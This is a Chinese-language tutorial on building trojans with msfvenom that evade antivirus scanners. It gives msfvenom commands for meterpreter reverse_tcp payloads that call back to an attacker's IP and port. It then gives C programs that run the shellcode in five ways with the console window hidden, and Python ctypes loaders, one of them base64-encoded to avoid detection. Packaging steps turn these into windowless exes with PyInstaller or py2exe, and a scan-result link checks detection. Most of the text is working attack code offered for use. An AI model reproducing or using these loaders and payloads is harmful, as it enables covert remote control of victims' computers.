msfvenom——木马免杀篇
msfvenom——木马免杀篇
c语言执行
生成shellcode.c
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c
然后将生成的文件打开,复制十六进制代码,到结尾的分号。
c语言执行
复制到c语言中
//C语言执行shellcode的五种方法
#include <windows.h>
#include <stdio.h>
//data段可读写
#pragma comment(linker, "/section:.data,RWE")
//不显示窗口
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO")
//一段打开Windows计算器(calc.exe)的shellcode
unsigned char shellcode_calc[] =
"\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23"
"\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0"
"\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3"
"\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f"
"\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4"
"\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2"
"\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba"
"\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f"
"\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56"
"\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9"
"\xe4";
unsigned char shellcode[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52"
"\xe8\x61\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58"
"\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89"
"\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
typedef void (__stdcall *CODE) ();
//http://rshell.blog.163.com/blog/static/41619170201110302937361/
//第一种方法
void RunShellCode_1()
{
PVOID p = NULL;
if ((p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
MessageBoxA(NULL, "申请内存失败", "提醒", MB_OK);
if (!(memcpy(p, shellcode, sizeof(shellcode))))
MessageBoxA(NULL, "写内存失败", "提醒", MB_OK);
CODE code =(CODE)p;
code();
}
//第二种方法
void RunShellCode_2()
{
((void(*)(void))&shellcode)();
}
//第三种方法
void RunShellCode_3()
{
__asm
{
lea eax, shellcode;
jmp eax;
}
}
//第四种方法
void RunShellCode_4()
{
__asm
{
mov eax, offset shellcode;
jmp eax;
}
}
//第五种方法
void RunShellCode_5()
{
__asm
{
mov eax, offset shellcode;
_emit 0xFF;
_emit 0xE0;
}
}
void main()
{
//RunShellCode_1();
//RunShellCode_2();
//RunShellCode_3();
//RunShellCode_4();
RunShellCode_5();
}
eg:
#include "pch.h"
#include <iostream>
#include "stdio.h"
#include "Windows.h"
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //去除窗口
//步骤b所在桌面产生的 shellcode.c的内容;
unsigned char shellcode[] =
void main()
{
//ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);
LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, shellcode, sizeof(shellcode));
((void(*)())Memory)();
}
检查
查杀地址:http://r.virscan.org/language/zh-cn/report/dc322aacd4209d2a3366c9fb74a3442b
python语言执行
方法一:python加载C代码
import ctypes
shellcode = bytearray("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
然后要使用PyInstaller将py转为exe,pyinstaller依赖于pywin32,在使用pyinstaller之前,应先安装pywin32。
pywin32下载后,点击下一步安装即可
https://sourceforge.net/projects/pywin32/files/pywin32
pyinstaller 下载
https://github.com/pyinstaller/pyinstaller/releases
,解压,安装好依赖包pip install -r requirements.txt
,即可使用。将
pyshellcode.py
复制到C:\Python27_x86\pyinstaller
目录中,在该目录下执行命令编译exe:
python pyinstaller.py -F -w pyshellcode.py
方法2:py2exe打包编译exe
该方法借用了免杀工具Python-Rootkit
的思路。
首先要在windows上安装x86版的python。
注意:必须使用x86版本Python 2.7,即使Windows是x64的,也要安装32位版本。
我这里安装的是Python 2.7.16 x86 windows版:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
之后安装32位Py2exe for python 2.7,https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
在Windows上安装OpenSSL(可选)
msfvenom生成python payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw -o shell.py
创建文件setup.py
from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
在msf中设置payloadwindows/meterpreter/reverse_tcp
,监听相应3333端口。
在windows下执行python.exe .\setup.py py2exe
,(文件大小11M)
方法3:base64编码
和2.1方法一样,先生成shellcode, 先用msfvenom生成shellcode,记得要用base64编码:
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=10.211.55.2 LPORT=3333 -f c
python代码如下:
import ctypes
import base64
encode_shellcode = ""
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
使用pyinstaller编译打包exe
python pyinstaller.py -F -w pyshellcode.py